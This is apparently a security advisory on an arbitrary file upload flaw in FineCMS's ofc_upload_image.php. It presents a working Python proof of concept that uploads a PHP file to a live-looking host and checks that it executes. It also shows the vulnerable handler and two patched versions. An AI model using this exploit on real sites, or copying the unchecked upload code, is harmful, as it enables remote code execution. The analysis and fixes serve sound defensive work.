FineCMS /dayrui/libraries/Chart/ofc_upload_image.php Arbitrary File Upload Vulnerability


    Contents

    1. Vulnerability description
    2. Trigger conditions
    3. Affected scope
    4. Vulnerable code analysis
    5. Defenses
    6. Attack and defense reflections

    1. Vulnerability description

    Relevant Link:

    http://www.wooyun.org/bugs/wooyun-2015-0105251


    2. Trigger conditions

    0x1: POC

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    #__author__ = '1c3z'
    # Python 2 script (urllib2, print statement), reproduced as published.

    import urllib2
    import random

    # Random file name so repeated runs do not collide in the upload directory.
    fileName = "shell" + str(random.randrange(1000,9999)) + ".php"
    target = "http://v1.finecms.net/dayrui/libraries/Chart/ofc_upload_image.php"

    def uploadShell():
        # The handler takes the file name from ?name= and writes the raw POST body to it.
        url = target + "?name=" + fileName
        req = urllib2.Request(url, headers={"Content-Type": "application/oct"})
        res = urllib2.urlopen(req, data="<?print(md5(0x22))?>")
        return res.read()

    def poc():
        res = uploadShell()
        # On success the handler echoes "Saving your image to: ../tmp-upload-images/<name>".
        if res.find("tmp-upload-images") == -1:
            print "Failed !"
            return

        print "upload Shell success"
        url = "http://v1.finecms.net/dayrui/libraries/tmp-upload-images/" + fileName
        md5 = urllib2.urlopen(url).read()
        # If the response contains the expected md5 of 0x22, the uploaded file was executed as PHP.
        if md5.find("e369853df766fa44e1ed0ff613f563bd") != -1:
            print "poc: " + url

    poc()


    3. Affected scope
    4. Vulnerable code analysis

    /dayrui/libraries/Chart/ofc_upload_image.php

    $default_path = '../tmp-upload-images/'; 
    if (!file_exists($default_path)) mkdir($default_path, 0777, true);
    $destination = $default_path . basename( $_GET[ 'name' ] ); 
    echo 'Saving your image to: '. $destination;
    
    $jfh = fopen($destination, 'w') or die("can't open file");
    fwrite($jfh, $HTTP_RAW_POST_DATA);
    fclose($jfh);

    The program performs no check or filtering of the uploaded file's extension or content: the destination name is taken straight from $_GET['name'] (basename() only strips directory components, it does not restrict the extension), and the raw POST body is written to that path unchanged.


    5. Defenses

    /dayrui/libraries/Chart/ofc_upload_image.php

    $default_path = '../tmp-upload-images/'; 
    if (!file_exists($default_path)) 
        mkdir($default_path, 0777, true);
    
    $destination = $default_path . basename( $_GET[ 'name' ] ); 
    
    /* Reject file names ending in a script extension (the original pattern used
       [^a-zA-Z0-9]+$, which requires at least one trailing non-alphanumeric
       character and therefore did not match a plain "shell.php"; the dot is
       now escaped so it only matches a literal dot). */
    if (preg_match('#\.(php|pl|cgi|asp|aspx|jsp|php5|php4|php3|shtm|shtml)[^a-zA-Z0-9]*$#i', trim($destination)))
    {
        die("你指定的文件名被系统禁止!");
    }
    
    echo 'Saving your image to: '. $destination;
    
    $jfh = fopen($destination, 'w') or die("can't open file");
    fwrite($jfh, $HTTP_RAW_POST_DATA);
    fclose($jfh);
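    The extension blacklist above only rejects names the pattern happens to cover. A hardened replacement for the handler, added here as an example (it is not FineCMS's own code and not the fix proposed above), goes further than the page's patch: it allowlists image extensions, checks that the body really is an image, generates the stored file name on the server, and reads the body from php://input instead of the deprecated $HTTP_RAW_POST_DATA. It assumes PHP 7 or later (random_bytes) and that the handler still receives the name in $_GET['name'] and the image bytes in the request body; the directory name is kept from the original.

```php
<?php
// Added example, not FineCMS code: hardened replacement for ofc_upload_image.php.
// Assumptions: PHP >= 7, name still arrives in $_GET['name'], body is the raw image.
declare(strict_types=1);

// Allowlist of accepted image extensions and the MIME type getimagesize() reports for each.
const ALLOWED_TYPES = [
    'png'  => 'image/png',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'gif'  => 'image/gif',
];

/**
 * Validate a client-supplied file name and raw body.
 * Returns the server-chosen file name to store under, or null to reject the upload.
 */
function validate_image_upload(string $client_name, string $raw_body): ?string
{
    // basename() alone is not enough: it keeps whatever extension the client chose.
    $name = basename(trim($client_name));

    // Only the final extension counts, and only if it is in the allowlist
    // (so names such as shell1234.php from the POC are rejected outright).
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!isset(ALLOWED_TYPES[$ext])) {
        return null;
    }

    // The body must parse as an image of the claimed type; PHP source with an
    // image extension fails here.
    $info = @getimagesizefromstring($raw_body);
    if ($info === false || ($info['mime'] ?? '') !== ALLOWED_TYPES[$ext]) {
        return null;
    }

    // Never reuse the client-chosen name: pick a random one server-side.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

$default_path = __DIR__ . '/../tmp-upload-images/';
if (!is_dir($default_path)) {
    // 0755 instead of 0777: only the web server user needs to write here.
    mkdir($default_path, 0755, true);
}

$raw = file_get_contents('php://input');   // replaces $HTTP_RAW_POST_DATA
$safe_name = validate_image_upload($_GET['name'] ?? '', $raw);
if ($safe_name === null) {
    http_response_code(400);
    exit('Upload rejected: only PNG, JPEG and GIF images are accepted.');
}

$destination = $default_path . $safe_name;
if (file_put_contents($destination, $raw, LOCK_EX) === false) {
    http_response_code(500);
    exit("can't open file");
}

// Report only the server-chosen name; the client-supplied one is never echoed back.
echo 'Saved image as: ' . $safe_name;
```

    Even with these checks in place, the tmp-upload-images directory should be served with script execution disabled in the web server configuration, so that a file which slips through validation is returned as static content rather than run as PHP.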


    6. Attack and defense reflections

    Copyright (c) 2015 LittleHann All rights reserved

    Original article: https://www.cnblogs.com/LittleHann/p/4729648.html